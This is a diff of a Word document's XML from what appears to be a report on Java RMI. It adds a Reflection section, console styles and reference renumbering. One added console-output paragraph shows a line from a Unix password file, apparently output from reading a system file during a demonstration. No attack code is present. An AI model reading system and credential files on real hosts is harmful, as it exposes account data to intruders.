+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>_</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>taskgated</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>:*:13:13</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>:Task</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Gate Daemon:/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/empty:/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/bin/false</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc396750013"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc396784313"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Reflection:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Version control: use of git and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>github</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Prolonged yet adventurous error and trial phases during development, lack of documentation on Oracle and other tutorial sites on different exceptions.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Full exception list is to be added in appendix.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Do not feel any further work to be done in this area, because:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BulletStyle1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>RMI is</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> almost dying out </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">and a near </w:t>
+      </w:r>
+      <w:r>
+        <w:t>obsolete technology</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in present time</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BulletStyle1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Not much support or documents around, not many people reported and serious matter of concerns</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BulletStyle1"/>
+      </w:pPr>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Conclusion:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:r>
@@ -7581,7 +9165,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc396750014"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc396784314"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>References</w:t>
@@ -7592,17 +9176,17 @@
       <w:r>
         <w:t>:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="24"/>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc396750015"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc396784315"/>
       <w:r>
         <w:t>References:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="25"/>
+      <w:bookmarkEnd w:id="28"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7656,7 +9240,7 @@
       <w:r>
         <w:t>: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId10" w:history="1">
+      <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7692,7 +9276,7 @@
       <w:r>
         <w:t xml:space="preserve">]. Available from: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId11" w:history="1">
+      <w:hyperlink r:id="rId12" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7725,7 +9309,7 @@
       <w:r>
         <w:t xml:space="preserve">]. Available from: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId12" w:history="1">
+      <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7765,7 +9349,7 @@
       <w:r>
         <w:t xml:space="preserve">]. Available from: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId13" w:history="1">
+      <w:hyperlink r:id="rId14" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7792,7 +9376,7 @@
       <w:r>
         <w:t xml:space="preserve">]. Available from: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId14" w:history="1">
+      <w:hyperlink r:id="rId15" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7819,7 +9403,7 @@
       <w:r>
         <w:t xml:space="preserve">]. Available from: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId15" w:history="1">
+      <w:hyperlink r:id="rId16" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7907,7 +9491,7 @@
         </w:rPr>
         <w:t> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId16" w:history="1">
+      <w:hyperlink r:id="rId17" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7930,11 +9514,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Toc396750016"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc396784316"/>
       <w:r>
         <w:t>Keywords:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="26"/>
+      <w:bookmarkEnd w:id="29"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10477,6 +12061,59 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ConsoleError">
+    <w:name w:val="Console Error"/>
+    <w:basedOn w:val="CodeSnippet"/>
+    <w:link w:val="ConsoleErrorChar"/>
+    <w:qFormat/>
+    <w:rsid w:val="00A50865"/>
+    <w:rPr>
+      <w:b w:val="0"/>
+      <w:color w:val="FF0000"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ConsoleOutput">
+    <w:name w:val="Console Output"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="ConsoleOutputChar"/>
+    <w:qFormat/>
+    <w:rsid w:val="00A50865"/>
+    <w:pPr>
+      <w:widowControl w:val="0"/>
+      <w:autoSpaceDE w:val="0"/>
+      <w:autoSpaceDN w:val="0"/>
+      <w:adjustRightInd w:val="0"/>
+      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
+      <w:ind w:firstLine="0"/>
+      <w:contextualSpacing/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Monaco" w:hAnsi="Monaco" w:cs="Monaco"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="ConsoleErrorChar">
+    <w:name w:val="Console Error Char"/>
+    <w:basedOn w:val="CodeSnippetChar"/>
+    <w:link w:val="ConsoleError"/>
+    <w:rsid w:val="00A50865"/>
+    <w:rPr>
+      <w:color w:val="FF0000"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="ConsoleOutputChar">
+    <w:name w:val="Console Output Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="ConsoleOutput"/>
+    <w:rsid w:val="00A50865"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Monaco" w:eastAsia="Times New Roman" w:hAnsi="Monaco" w:cs="Monaco"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:eastAsia="en-GB"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

</xml_diff>